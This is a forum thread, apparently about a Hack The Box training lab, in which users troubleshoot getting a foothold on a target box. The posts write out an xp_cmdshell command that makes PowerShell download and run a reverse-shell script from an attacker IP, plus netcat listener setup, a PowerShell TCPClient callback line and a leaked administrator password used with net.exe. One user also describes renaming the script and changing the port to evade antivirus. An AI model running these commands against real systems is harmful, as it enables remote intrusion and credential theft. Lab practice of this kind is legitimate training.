Starting Point: Foothold - Errors in Powershell file despite copying from directions

pelmic93 · April 11, 2020, 4:53am

So, in Foothold section of Starting Point and when running the command
"xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.32/shell.ps1\“);”
I get an errors regarding “Missing Token ‘)’” or “Unexpected token ‘)’” despite the fact I just copied the powershell script from the directions.

with the python webserver running, once I run the SQL command the webserver returns with
“10.10.10.27 - - [11/Apr/2020 00:42:50] “GET /shell.ps1 HTTP/1.1” 200 -”

The netcat command still listens for a connection on port 443, just waitin’.

I’m not entirely sure what to do about the powershell script since it looks exactly as it is written in the directions (both the ps file and SQL command have my HTB VPN IP listed on it instead of the standard 10.10.14.3)

tasidonya · April 17, 2020, 2:10pm

Can you post a screenshot of your terminal? Maybe we’ll be able to spot what’s up from there.

zatoichi79 · April 17, 2020, 2:52pm

I have an issue with the foot hole as well I dont know how to save the PowerShell recerse or where to. I havecheck all the UFW settings and the sever settings and they are working. I have also change the IP address in the cmd shell to mach my own. but i have no idea what to do next. Here is where I am stucked

Let’s attempt to get a proper shell, and proceed to further enumerate the system. We can save the PowerShell reverse shell below as shell.ps1.
.

tasidonya · April 17, 2020, 3:07pm

@zatoichi79

Create the powershell file
Save it in any folder on your machine
From inside that folder run python3 -m http.server 8080
Go back to your remote shell that runs SQL and run the xp shell command (the one that has powershell and DownloadString in it, I get blocked if I write it in full) from the walkthrough, replacing the IP address with your own and adding port 8080 after, like so http://<your ip>:8080
This will upload the script onto the remote machine and you should proceed with the walkthrough as normal.

J0hnW1ck · April 26, 2020, 7:25am

@tasidonya

ARMI · May 28, 2020, 1:24pm

Type your comment> @tasidonya said:

@zatoichi79

Create the powershell file

Save it in any folder on your machine

From inside that folder run python3 -m http.server 8080

Go back to your remote shell that runs SQL and run the xp shell command (the one that has powershell and DownloadString in it, I get blocked if I write it in full) from the walkthrough, replacing the IP address with your own and adding port 8080 after, like so http://<your ip>:8080

This will upload the script onto the remote machine and you should proceed with the walkthrough as normal.

I am sory. I need help you.

In this image we can see that I can make the connection correctly, but I cannot execute the type and net.exe commands in order to change the administrator password. Could you help me?

tasidonya · May 28, 2020, 6:32pm

Type your comment> @ARMI said:

I am sory. I need help you.
error hosted at ImgBB — ImgBB
In this image we can see that I can make the connection correctly, but I cannot execute the type and net.exe commands in order to change the administrator password. Could you help me?
Don’t worry, we’ll figure it out
Two questions.

Did you change the ip inside the ps1 file?
Did you try typing a command in your nc tab?

ARMI · May 28, 2020, 7:09pm

Type your comment> @tasidonya said:

Type your comment> @ARMI said:

I am sory. I need help you.
error hosted at ImgBB — ImgBB
In this image we can see that I can make the connection correctly, but I cannot execute the type and net.exe commands in order to change the administrator password. Could you help me?
Don’t worry, we’ll figure it out
Two questions.

Did you change the ip inside the ps1 file?

Did you try typing a command in your nc tab?

Hello

1- Net.Sockets.TCPClient(“10.10.14.153”,443) → change IP
2- ¿What is the meaning of NC?
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
and after
net.exe use T: \Archetype\backups /user:administrator MEGAC0RP

thx a lot

ARMI · May 28, 2020, 11:28pm

Type your comment> @tasidonya said:

Type your comment> @ARMI said:

I am sory. I need help you.
error hosted at ImgBB — ImgBB
In this image we can see that I can make the connection correctly, but I cannot execute the type and net.exe commands in order to change the administrator password. Could you help me?
Don’t worry, we’ll figure it out
Two questions.

Did you change the ip inside the ps1 file?

Did you try typing a command in your nc tab?

Issue solved. Very Very Thank You

tasidonya · May 29, 2020, 10:30am

@ARMI What was the issue?

ARMI · May 29, 2020, 12:13pm

The issu was layer 8. I wasn’t typing on NC console.
tHX

kcaaj · June 8, 2020, 2:15am

It brings me joy to know I’m not the only person having problems with this. But the problems I’m having are just so strange. Like, this really should /not/ be happening.
I was going to make a ticket but if it isn’t necessary then I won’t, but again, I really don’t think this should be happening.

Basically, I’ve followed the foothold page up until the point where I’m to receive a reverse shell from the box by uploading & running the powershell script found on the page. I’ve got my python http server listening on 8080, with the reverse shell script in the cwd, in this case I named it legit.ps1… Of course also got nc listening for the shell to come back to me on port 413.

My first few attempts, were relatively successful! The only thing being that when I executed the oneliner from within the SQL shell, to download the reverse shell script from my web server, the box whined @ me, claiming that I was trying to execute malicious code! Would you believe that? Preposterous and baseless accusations. ;^)

So at the time I just thought, “it didn’t mention anything about having to get around any kind of av, but maybe this is just something they purposely didn’t mention?”
Considering this new unforeseen challenge that had arisen, I changed the script’s filename - from shell.ps1, to legit.ps1, as I mentioned above. Additionally, I had changed the default port for the reverse shell from 443, to 431, as also I mentioned above. I also added the friendliest of comments to the very top of the script, cause I’m a friendly dude, no malicious here.

I regret to say that all of my efforts were in vain, as the box would still complain. But, now, about something different!

A picture is worth a thousand words:

Original error about malicious code: https://i.imgur.com/yGmK884.png
New error: https://i.imgur.com/xmxAt6Z.png

Let it be known that the connection is made & the script downloaded, just not executed - in the first error.
But the second error, however, is the weirder one. If you read the error, it’s basically saying that it doesn’t know what the ■■■■ I’m trying to do. Or, well, it does know, but that it just can’t/won’t?? The strangest part about this one is that is seems to just disappear after a little while, like it just stops happening after a while when I try again. And instead of that weird error, I’m back to the AV malicious code detection error.

I am using the exact same script & command for downloading the script every single time. I looked around online before thinking about posting this myself.

I have started from scratch with fresh copies of the resources given on the page. I’ve tried a couple of different reverse shell scripts too, but to no avail.

I wouldn’t be finding this so much of a problem if it wasn’t literally the starting point ■■■■.
Main reason I’m posting this is because there are no mentions anywhere within the starting point’s page about there being anything remotely close to what’s in the contents of the images I linked, or what I’ve encountered off the bat.

Apologies for the huge wall of text. Had to make sure I had all of the details I needed.
I’m incredibly eager to hear feedback on this.